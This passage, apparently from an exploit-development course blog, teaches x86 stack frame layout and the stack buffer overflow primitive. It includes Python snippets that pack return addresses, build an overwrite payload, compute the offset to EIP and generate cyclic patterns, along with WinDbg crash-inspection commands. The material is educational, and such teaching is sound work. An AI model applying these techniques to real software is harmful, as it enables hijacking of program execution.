<p><strong><code>sub esp, 20</code></strong> moves ESP down by 20 bytes, reserving space for <code>buf[16]</code> and <code>int x</code> (4 bytes). The compiler calculates the total size of all locals at compile time and emits a single <code>sub esp</code> to reserve all of it at once. You will never see one <code>sub</code> per variable. Real compilers often round the amount up for alignment, so the constant in a disassembly can be larger than the sum of the locals.</p>
<p>After the prologue, the stack looks like this:</p>
<pre tabindex="0"><code>High Address
┌─────────────────┐
│        2        │  [ebp+12]  argument b
├─────────────────┤
│        1        │  [ebp+8]   argument a
├─────────────────┤
│  return address │  [ebp+4]
├─────────────────┤
│   saved EBP     │  [ebp]     EBP points here
├─────────────────┤
│    buf[16]      │  [ebp-16] to [ebp-1]
├─────────────────┤
│      int x      │  [ebp-20]  ESP points here
└─────────────────┘
Low Address
</code></pre><p>Notice a few things:</p>
<p>Arguments live <strong>above</strong> EBP at positive offsets. Locals live <strong>below</strong> EBP at negative offsets. This is why you will constantly see things like <code>[ebp+8]</code> for the first argument and <code>[ebp-4]</code> for the first local in disassembly. That is not a coincidence. It is the direct result of the prologue.</p>
<p>Also notice that locals declared <strong>first</strong> end up at higher addresses (closer to saved EBP). Locals declared later end up at lower addresses. The stack grows downward, so as space gets reserved, it goes down. This ordering matters when you calculate overflow offsets.</p>
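<p>A small sketch of how those negative offsets fall out, assuming the simple model used here: locals are laid out in declaration order with no padding or reordering. Real compilers are free to do otherwise, so always confirm against the disassembly. <code>frame_offsets</code> is an illustrative helper.</p>

```python
def frame_offsets(locals_in_order):
    """Map each local to the EBP offset of its lowest byte.

    The first-declared local sits closest to saved EBP. Returns the offsets
    and the total size a `sub esp, N` would need to reserve.
    """
    offsets, cursor = {}, 0
    for name, size in locals_in_order:
        cursor -= size
        offsets[name] = cursor
    return offsets, -cursor


offsets, reserve = frame_offsets([("buf", 16), ("x", 4)])
for name, off in offsets.items():
    print(f"{name:<3} starts at [ebp{off}]")
print("sub esp,", reserve)
```

<p>For <code>foo</code> this places <code>buf</code> at <code>[ebp-16]</code> through <code>[ebp-1]</code> and <code>x</code> at <code>[ebp-20]</code>, which is also where ESP sits after <code>sub esp, 20</code>.</p>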
<hr>
<h2 id="leaving-the-function-the-epilogue">Leaving the Function: The Epilogue</h2>
<p>When <code>foo</code> is done, it needs to tear down the frame and return. This is the <strong>epilogue</strong>:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-nasm" data-lang="nasm"><span class="line"><span class="cl"><span class="nf">mov</span> <span class="nb">esp</span><span class="p">,</span> <span class="nb">ebp</span>    <span class="c1">; point ESP back at saved EBP, discarding all locals</span>
</span></span><span class="line"><span class="cl"><span class="nf">pop</span> <span class="nb">ebp</span>         <span class="c1">; restore caller&#39;s EBP, ESP now points at return address</span>
</span></span><span class="line"><span class="cl"><span class="nf">ret</span>             <span class="c1">; pop return address into EIP, jump there</span>
</span></span></code></pre></div><p>Walk through each one:</p>
<p><strong><code>mov esp, ebp</code></strong> collapses the local variable space in one shot. ESP jumps back up to where EBP is pointing, which is saved EBP. All the locals are now gone as far as the stack is concerned.</p>
<p><strong><code>pop ebp</code></strong> reads the saved EBP value off the stack into the EBP register, restoring the caller&rsquo;s frame. ESP moves up by 4, now pointing at the return address.</p>
<p><strong><code>ret</code></strong> is the most important instruction in exploit development. Conceptually it is equivalent to:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-nasm" data-lang="nasm"><span class="line"><span class="cl"><span class="nf">pop</span> <span class="nv">eip</span>         <span class="c1">; read whatever ESP points to, put it in EIP, add 4 to ESP</span>
</span></span></code></pre></div><p>The CPU takes the return address off the stack and jumps there. Execution resumes in the caller right after the original <code>call foo</code>.</p>
<p>After <code>ret</code>, the stack is back to what it looked like before the call.</p>
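<p>To see the prologue and epilogue cancel each other out, here is a minimal simulation of <code>foo</code>&rsquo;s frame. The register values and the return address <code>0x401005</code> are placeholders, and <code>run_foo_frame</code> is an illustrative name.</p>

```python
import struct


def run_foo_frame(esp, ebp, mem):
    """Apply foo's prologue, then its epilogue; return (esp, ebp, eip)."""
    # prologue
    esp -= 4
    struct.pack_into("<I", mem, esp, ebp)        # push ebp
    ebp = esp                                    # mov ebp, esp
    esp -= 20                                    # sub esp, 20
    # epilogue
    esp = ebp                                    # mov esp, ebp
    (ebp,) = struct.unpack_from("<I", mem, esp)  # pop ebp
    esp += 4
    (eip,) = struct.unpack_from("<I", mem, esp)  # ret
    esp += 4
    return esp, ebp, eip


mem = bytearray(0x100)
struct.pack_into("<I", mem, 0x80, 0x401005)      # return address left at ESP by CALL
esp, ebp, eip = run_foo_frame(esp=0x80, ebp=0xC0, mem=mem)
print(hex(esp), hex(ebp), hex(eip))
```

<p>EBP comes back unchanged, EIP receives the stored return address, and ESP ends up 4 bytes above where it was on entry. If anything overwrites those two stack slots in between, the epilogue loads the overwritten values instead.</p>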
<hr>
<h2 id="a-note-on-pointer-arguments">A Note on Pointer Arguments</h2>
<p>One thing that catches beginners out. When a function takes a pointer argument like <code>char *str</code>, the caller does not push the string onto the stack. It pushes a <strong>4-byte address</strong> pointing to where the string lives in memory.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="kt">void</span> <span class="nf">bar</span><span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="n">name</span><span class="p">,</span> <span class="kt">int</span> <span class="n">age</span><span class="p">)</span> <span class="p">{</span> <span class="p">...</span> <span class="p">}</span>
</span></span><span class="line"><span class="cl"> 
</span></span><span class="line"><span class="cl"><span class="nf">bar</span><span class="p">(</span><span class="s">&#34;alice&#34;</span><span class="p">,</span> <span class="mi">25</span><span class="p">);</span>
</span></span></code></pre></div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-nasm" data-lang="nasm"><span class="line"><span class="cl"><span class="nf">push</span> <span class="mi">25</span>                  <span class="c1">; int age (4 bytes)</span>
</span></span><span class="line"><span class="cl"><span class="nf">push</span> <span class="o">&lt;</span><span class="nv">addr</span> <span class="nv">of</span> <span class="s">&#34;alice&#34;</span><span class="o">&gt;</span>   <span class="c1">; char* name (4-byte pointer, not the string itself)</span>
</span></span><span class="line"><span class="cl"><span class="nf">call</span> <span class="nv">bar</span>
</span></span></code></pre></div><p>The string <code>&quot;alice&quot;</code> itself sits somewhere in the data segment. What goes on the stack is a pointer to it. Always 4 bytes on x86, regardless of how long the string is.</p>
<hr>
<h2 id="little-endian-memory">Little-Endian Memory</h2>
<p>One more thing you need burned in before you write any exploit code.</p>
<p>x86 is <strong>little-endian</strong>. Multi-byte values are stored in memory with the least significant byte at the lowest address.</p>
<p>So the address <code>0x42658ade</code> in memory looks like:</p>
<pre tabindex="0"><code>Address:  0x00   0x01   0x02   0x03
Value:    de     8a     65     42
</code></pre><p>When you build a Python payload and need to put an address in your buffer, you have to account for this:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">struct</span>
</span></span><span class="line"><span class="cl"><span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s2">&#34;&lt;I&#34;</span><span class="p">,</span> <span class="mh">0x42658ade</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="c1"># produces: b&#39;\xde\x8a\x65\x42&#39;</span>
</span></span></code></pre></div><p>The <code>&lt;I</code> means little-endian unsigned 32-bit integer. Get this backwards and your exploit crashes every time at <code>ret</code> because EIP gets loaded with the wrong address. This is one of the most common reasons a first exploit attempt fails.</p>
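<p>A quick way to see what goes wrong when the byte order is flipped, using the same example address:</p>

```python
import struct

addr = 0x42658ade

little = struct.pack("<I", addr)   # correct for x86
big = struct.pack(">I", addr)      # the common mistake

# What EIP would actually receive if the big-endian bytes were placed on the stack
loaded = struct.unpack("<I", big)[0]

print(little.hex(), big.hex(), hex(loaded))
```

<p>The CPU always reads the four bytes as little-endian, so the big-endian packing sends execution to <code>0xde8a6542</code> instead of the intended address.</p>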
<hr>
<h2 id="the-exploit-primitive">The Exploit Primitive</h2>
<p>Here is where it all connects.</p>
<p><code>buf[16]</code> lives near the bottom of the stack frame. If a function copies user-controlled data into <code>buf</code> without checking the length, the copy writes upward in memory, toward higher addresses. It fills the buffer first, then keeps going.</p>
<p>Starting from the first byte of <code>buf</code>:</p>
<pre tabindex="0"><code>Bytes 1-16    fill buf[16]
Bytes 17-20   overwrite saved EBP
Bytes 21-24   overwrite the return address
</code></pre><p><strong>Offset to EIP = 20 bytes</strong></p>
<p>When the function returns and <code>ret</code> executes, it pops whatever is at ESP into EIP. You put your own address at offset 20 (bytes 21-24). The CPU jumps there. You own execution.</p>
<p>That is the primitive. That is what every stack overflow in this course is built on.</p>
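<p>A minimal sketch of that payload for the <code>buf[16]</code> layout. The return address here is only a placeholder that reuses the example value from the little-endian section. In a real exploit it would be an address you chose yourself, such as a <code>JMP ESP</code> gadget.</p>

```python
BUF_SIZE = 16          # char buf[16]
SAVED_EBP_SIZE = 4     # saved EBP sits directly above buf
RET_ADDR = 0x42658ADE  # placeholder value, not a real gadget address

payload = b"A" * BUF_SIZE                  # bytes 1-16: fill buf
payload += b"B" * SAVED_EBP_SIZE           # bytes 17-20: overwrite saved EBP
payload += RET_ADDR.to_bytes(4, "little")  # bytes 21-24: new return address

print(len(payload))        # 24
print(payload[20:].hex())  # de8a6542
```

<p>Using a different filler byte for saved EBP makes the two regions easy to tell apart in a debugger.</p>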
<hr>
<h2 id="calculating-the-offset-the-formula">Calculating the Offset: The Formula</h2>
<pre tabindex="0"><code>offset to EIP = size of buf
              + size of locals at HIGHER addresses than buf
              + 4 bytes for saved EBP
</code></pre><p>The tricky part is the second term. Locals at higher addresses than <code>buf</code> sit between <code>buf</code> and <code>saved EBP</code>. You have to overflow through them to reach <code>saved EBP</code> and then the return address.</p>
<p>Locals at <strong>lower</strong> addresses than <code>buf</code> are irrelevant. The overflow travels upward, away from them.</p>
<p>Example:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="kt">void</span> <span class="nf">vuln</span><span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="n">input</span><span class="p">,</span> <span class="kt">int</span> <span class="n">len</span><span class="p">)</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">    <span class="kt">char</span> <span class="n">buf</span><span class="p">[</span><span class="mi">64</span><span class="p">];</span>
</span></span><span class="line"><span class="cl">    <span class="kt">int</span> <span class="n">check</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span></code></pre></div><p>Stack after prologue:</p>
<pre tabindex="0"><code>High Address
┌─────────────────┐
│      len        │  argument
├─────────────────┤
│   input ptr     │  argument (4-byte pointer)
├─────────────────┤
│  return address │  [ebp+4]
├─────────────────┤
│   saved EBP     │  [ebp]
├─────────────────┤
│    buf[64]      │
├─────────────────┤
│     check       │  ESP points here
└─────────────────┘
Low Address
</code></pre><p><code>check</code> is below <code>buf</code>. The overflow never touches it. <code>saved EBP</code> is directly above <code>buf</code>.</p>
<p>Offset to EIP = 64 + 4 = <strong>68 bytes</strong>.</p>
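<p>The formula is small enough to write as a helper. This is only a sketch: the function name and parameters are invented for illustration, and a real compiler may reorder locals or add padding, so treat the result as an estimate to confirm in the debugger.</p>

```python
def offset_to_eip(buf_size, locals_above=0, saved_ebp_size=4):
    """Bytes to write before the first byte of the return address."""
    return buf_size + locals_above + saved_ebp_size


print(offset_to_eip(64))                  # 68, the vuln() example
print(offset_to_eip(16))                  # 20, the buf[16] example
print(offset_to_eip(64, locals_above=4))  # 72, if a 4-byte local sat above buf
```

<p>The last call is a hypothetical layout, included only to show how a local above the buffer changes the total.</p>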
<hr>
<h2 id="windbg-reading-the-stack-live">WinDbg: Reading the Stack Live</h2>
<p>Once you are in a debugger staring at a crash, these are the commands you run immediately:</p>
<pre tabindex="0"><code>dd ebp      read saved EBP (tells you if the frame is corrupted)
dd ebp+4    read the return address (tells you what EIP will become)
dd esp      read the top of the stack
k           show the full call stack
r           dump all registers
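</code></pre><p>If you see a pattern like <code>41414141</code> at <code>[ebp+4]</code>, that means you&rsquo;ve overwritten the return address with <code>AAAA</code> and you now know your overflow is reaching EIP. If the function has already returned by the time you look, EBP itself will usually hold the overwritten saved-EBP value, so check EIP in the <code>r</code> output instead. From there it is a matter of finding the exact offset and replacing those bytes with something useful.</p>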
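<p>One common way to find the exact offset is to send a non-repeating pattern instead of a run of <code>A</code>s, then look up the four bytes that land in EIP. The sketch below builds an <code>Aa0Aa1Aa2...</code> style pattern similar to what pattern-generation tools produce. Both function names are made up for this example, and the offset of 68 is simulated rather than read from a real crash.</p>

```python
import string


def cyclic_pattern(length):
    """Build an 'Aa0Aa1Aa2...' style pattern of the requested length."""
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
    full = "".join(chunks).encode("ascii")
    if length not in range(len(full) + 1):
        raise ValueError("pattern supports at most %d bytes" % len(full))
    return full[:length]


def find_offset(eip_value, pattern):
    """Return the 0-based offset of the 4 bytes seen in EIP, or -1."""
    # EIP was loaded little-endian, so repack it the same way before searching.
    needle = eip_value.to_bytes(4, "little")
    return pattern.find(needle)


pattern = cyclic_pattern(200)

# Simulate a crash where the return address sits 68 bytes into the buffer.
eip_seen = int.from_bytes(pattern[68:72], "little")
print(find_offset(eip_seen, pattern))
```

<p>In practice <code>eip_seen</code> would be the EIP value WinDbg reports after the crash.</p>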
<hr>
<h2 id="quick-reference">Quick Reference</h2>
<table>
  <thead>
      <tr>
          <th>Instruction</th>
          <th>What It Does</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td><code>push ebp</code></td>
          <td>Save caller&rsquo;s frame pointer onto the stack</td>
      </tr>
      <tr>
          <td><code>mov ebp, esp</code></td>
          <td>Anchor EBP to current stack top</td>
      </tr>
      <tr>
          <td><code>sub esp, N</code></td>
          <td>Reserve N bytes for local variables</td>
      </tr>
      <tr>
          <td><code>mov esp, ebp</code></td>
          <td>Discard locals; ESP now points at the saved EBP slot</td>
      </tr>
      <tr>
          <td><code>pop ebp</code></td>
          <td>Restore caller&rsquo;s EBP, ESP moves to return address</td>
      </tr>
      <tr>
          <td><code>ret</code></td>
          <td>Pop return address into EIP, jump there</td>
      </tr>
  </tbody>
</table>
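<p>To see the six instructions work together, here is a toy model of the stack in Python. It is a sketch, not an emulator: the <code>Cpu</code> class, the starting register values, and the return address <code>0x00401234</code> are all invented for illustration.</p>

```python
class Cpu:
    """Tiny model of ESP, EBP, EIP and a dword-addressed stack."""

    def __init__(self):
        self.esp = 0x1000  # arbitrary starting stack pointer
        self.ebp = 0x2000  # caller's frame pointer (arbitrary)
        self.eip = 0
        self.mem = {}

    def push(self, value):
        self.esp -= 4              # stack grows toward lower addresses
        self.mem[self.esp] = value

    def pop(self):
        value = self.mem[self.esp]
        self.esp += 4
        return value


cpu = Cpu()
cpu.push(0x00401234)  # CALL pushes the return address

# Prologue
cpu.push(cpu.ebp)     # push ebp
cpu.ebp = cpu.esp     # mov ebp, esp
cpu.esp -= 16         # sub esp, 16 (room for locals)

# Overflow: the slot at [ebp+4] is overwritten with attacker data
cpu.mem[cpu.ebp + 4] = 0x41414141

# Epilogue
cpu.esp = cpu.ebp     # mov esp, ebp
cpu.ebp = cpu.pop()   # pop ebp
cpu.eip = cpu.pop()   # ret

print(hex(cpu.eip))   # 0x41414141
```

<p>Only the return address slot was changed, so EBP is restored correctly while EIP ends up with the attacker&rsquo;s value.</p>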
<hr>
<h2 id="key-takeaways">Key Takeaways</h2>
<ul>
<li>The stack grows downward. Push moves ESP toward lower addresses.</li>
<li>Arguments are pushed right to left by the caller before <code>CALL</code>.</li>
<li><code>CALL</code> = push return address + jump to function.</li>
<li>The prologue sets up the frame in three instructions. The epilogue tears it down in three instructions.</li>
<li>EBP is fixed for the life of the function. Arguments are at positive offsets from EBP. Locals are at negative offsets.</li>
<li><code>ret</code> = pop EIP. If you control what is at ESP when <code>ret</code> executes, you control where the CPU goes next.</li>
<li>Overflow travels upward in memory. Locals below the buffer are never reached.</li>
<li>x86 is little-endian. Addresses in payloads must be packed least significant byte first.</li>
<li>Offset to EIP = size of buf + locals above buf + 4 (saved EBP).</li>
</ul>
]]></content:encoded></item></channel></rss>